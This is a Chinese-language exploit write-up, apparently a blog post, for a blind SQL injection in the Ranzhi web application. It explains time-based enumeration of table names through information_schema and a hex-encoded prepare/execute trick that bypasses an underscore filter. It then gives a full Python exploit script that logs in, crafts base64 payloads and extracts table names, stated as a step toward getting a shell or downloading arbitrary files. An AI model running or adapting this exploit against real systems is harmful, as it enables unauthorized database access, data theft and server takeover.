前言
前面已经说明了 漏洞成因,这里介绍一下 exp 的编写。
正文
为了 getshell 或者是 任意文件下载, 我们需要修改 数据库中的 前缀sys_file 表, 所以我们的利用方式如下
- 使用
sql注入 获取程序数据库中任何一个表名, 取得前缀pre - 然后向
presys_file中插入目标路径。
在 mysql 5 中可以使用 information_schema 来获取指定数据库中的表。
在 information_schema 中的 tables 表里面存放着整个 mysql 里面保存的表的信息, table_schema 为 表所在的数据库, table_name 为表名。
所以使用
SELECT table_name FROM information_schema.tables where table_schema=database()
就可以得到 当前数据库的 所有表的表名(database() 返回当前的数据库名称)。
由于没有回显,需要使用一些 条件判断 相关的函数,这里我使用 if
select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,1 ,1))=16, SLEEP(3), 1)
if 的第一参数为 1 则返回第二个参数的值,否则返回 第3个参数的值.
上面的语句用到了子查询和 acsii, substr 来对检索到的结果根据其 ascii 值进行枚举,如果枚举到了,就 sleep(3)。
我们可以通过判断服务器的响应时间,来判断当前枚举位的具体值。
同时子查询只允许返回一行,所以使用 了 limit 0,1 来只返回第一条结果。
枚举表名的关键代码如下
table_name = ""
for i in range(1, table_len + 1):
for j in range(1, 129):
payload = get_payload_encode(
'''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
i, j))
start = time.time()
requests.get(host)
nor_time = (time.time() - start)
start = time.time()
requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
att_time = (time.time() - start)
if att_time - nor_time > 2:
table_name += chr(j)
print(table_name)
break
还有一个注意的就是,程序过滤了 _, 这里使用 prepare 和 execute 组合进行绕过,因为 mysql 支持字符串使用 16 进制编码输入。
def get_payload_encode(payload):
sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
raw = json.dumps(raw)
return base64.b64encode(raw.encode("utf-8")) # str---> byte 用 encode
最后的 exp:
# coding=utf-8
import requests
import base64
import time
import json
import binascii
import re
import hashlib
import chardet
def get_md5(input):
input = input.encode("utf-8")
m = hashlib.md5()
m.update(input)
return m.hexdigest()
def get_payload_encode(payload):
sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
raw = json.dumps(raw)
return base64.b64encode(raw.encode("utf-8")) # str---> byte 用 encode
# get_db_name(host)
def get_table_name(host):
path = "/cash/block-printTradeBlock.html?param="
target = host + path
# 查表名
table_len = 0
for i in range(1, 100):
payload = get_payload_encode(
'''select if((SELECT LENGTH(table_name)FROM information_schema.tables where table_schema=database() LIMIT 0,1)={}, SLEEP(3), 1);'''.format(
i))
start = time.time()
requests.get(host)
nor_time = (time.time() - start)
start = time.time()
requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
att_time = (time.time() - start)
if att_time - nor_time > 2:
table_len = i
break
print("db_len: %d" %(table_len))
table_name = ""
for i in range(1, table_len + 1):
for j in range(1, 129):
payload = get_payload_encode(
'''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
i, j))
start = time.time()
requests.get(host)
nor_time = (time.time() - start)
start = time.time()
requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
att_time = (time.time() - start)
if att_time - nor_time > 2:
table_name += chr(j)
print(table_name)
break
def login(url, username , password):
target = url + "/sys/user-login.html"
data = {"account": "admin", "password": "d4dba0bc2f7e946feaeacbdcdc167131",
"referer": "http://hack.ranzhi.top/sys/index.html", "rawPassword": "21232f297a57a5a743894a0e4a801fc3",
"keepLogin": "false"}
res = requests.get(target, headers=headers)
cookies['rid'] = res.cookies['rid']
random = re.findall('v.random = "(.*?)";', res.text)[0]
# 生成登录需要的数据
data['account'] = username
data['referer'] = target
data['rawPassword'] = get_md5(password)
data['password'] = get_md5(get_md5(get_md5(password) + username) + random)
res = requests.post(target, headers=headers, cookies=cookies, data=data)
if "self.location" in res.content.decode("utf-8"):
print("登录成功,下面开始 exploit")
else:
print("登录失败")
exit(0)
if __name__ == '__main__':
proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", }
cookies = {"lang": "zh-cn", "theme": "default", "keepLogin": "false", "rid": "6n6panbh36uqiqj4k5o0nbscq2",
" XDEBUG_SESSION": "19857"}
headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http://hack.ranzhi.top/sys/index.php", "Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
host = "http://hack.ranzhi.top:80/"
# get_table_name(host)
login(host, "test", "111111")
get_table_name(host)